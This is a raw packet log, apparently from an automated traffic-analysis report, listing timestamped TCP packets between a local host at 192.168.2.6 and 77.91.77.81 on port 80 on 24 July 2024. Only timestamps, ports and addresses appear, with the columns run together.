                                                                                        Jul 24, 2024 07:14:24.150955915 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.150984049 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.151025057 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.151144981 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.151160955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.151176929 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.151186943 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.151202917 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.151217937 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.157444954 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.157510996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.157589912 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.292678118 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.292716980 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.292732954 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.292756081 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.292777061 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.292802095 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.292819023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.292856932 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.293163061 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.293178082 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.293194056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.293220997 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.293247938 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.293273926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.293288946 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.293312073 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.293335915 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294153929 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294255972 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294267893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294311047 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294337034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294351101 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294374943 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294389963 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294413090 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294426918 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.294850111 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.294900894 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295015097 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295039892 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295053959 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295063019 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295080900 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295088053 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295094967 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295114040 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295825005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295842886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.295881033 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.295903921 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.364768028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.364840031 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.364912033 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402036905 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402170897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402188063 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402240038 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402260065 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402271986 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402287006 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402302980 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402322054 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402364016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402364016 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402518034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402534008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402549028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402563095 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402563095 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402576923 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402586937 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402597904 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.402750969 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.402801037 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403429985 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403456926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403472900 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403506994 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403522015 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403592110 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403608084 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403634071 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403642893 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403763056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403778076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403795004 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403810024 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403820038 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.403835058 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.403845072 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404176950 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404191971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404207945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404222012 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404231071 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404252052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404320955 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404335022 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404350996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404371023 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404378891 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404391050 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404416084 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404613018 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404628038 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404643059 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404655933 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404665947 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404679060 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404686928 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404700041 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404714108 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404733896 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.404903889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.404949903 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405061960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405097008 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405107021 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405121088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405131102 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405158997 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405371904 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405391932 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405409098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.405419111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405431032 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.405445099 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.407330990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.407356024 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.407371044 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.407432079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.453886032 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.453939915 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.453958035 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.454062939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.488946915 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.489003897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.489058971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.489087105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525115013 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525162935 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525178909 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525221109 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525235891 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525253057 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525392056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525499105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525499105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525566101 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525608063 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525630951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525630951 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525693893 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525727034 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525748014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525774002 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525799990 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525836945 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.525883913 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.525999069 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526032925 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526066065 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526087046 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526110888 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526156902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526189089 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526222944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526242971 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526273966 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526305914 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526326895 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526354074 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526382923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526511908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526566982 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526619911 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526653051 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526686907 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526707888 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526731014 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.526774883 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526808977 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526843071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.526864052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527138948 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527170897 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527193069 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527213097 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527242899 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527275085 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527308941 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527328968 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527359009 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527390957 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527415037 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527441025 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527465105 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527498960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527549028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527699947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527733088 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527765989 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527787924 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527812004 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527848959 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527899981 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527932882 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.527956963 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.527980089 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.528012037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.528044939 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.528062105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.528230906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.528264999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.528297901 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.528318882 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.528343916 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.528369904 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.531023026 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.542393923 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.542453051 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.542486906 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.542553902 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.542572021 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.543104887 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.577594042 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.577681065 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.577717066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.577752113 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.577891111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.577891111 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614433050 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614487886 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614522934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614557028 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614583969 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614629030 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614644051 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614675999 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614707947 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614727974 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614754915 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614778996 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614810944 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614845037 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.614866018 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.614895105 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615214109 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615432978 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615464926 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615488052 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615514040 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615537882 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615571022 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615622044 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615642071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615674019 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615709066 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615731001 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615760088 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615780115 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615813971 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615845919 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615864992 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615894079 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.615916014 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615947962 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.615982056 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616002083 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616029024 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616051912 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616085052 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616117954 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616137028 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616167068 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616208076 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616239071 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616271973 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616292953 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616327047 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616358995 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616877079 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616928101 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.616947889 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.616981983 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617013931 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617033958 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.617058039 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.617085934 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617116928 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617150068 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617170095 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.617201090 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.617249012 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.651977062 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652076960 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652110100 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652147055 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652147055 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652179003 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652215958 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652251005 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652323961 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652399063 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652452946 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652467966 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652528048 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652561903 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652584076 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652611017 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652635098 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652705908 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652729034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652759075 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652777910 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652812004 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.652831078 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.652858973 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.653038979 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.653070927 CEST804971877.91.77.81192.168.2.6
                                                                                        Jul 24, 2024 07:14:24.653093100 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.653115034 CEST4971880192.168.2.677.91.77.81
                                                                                        Jul 24, 2024 07:14:24.653143883 CEST804971877.91.77.81192.168.2.6
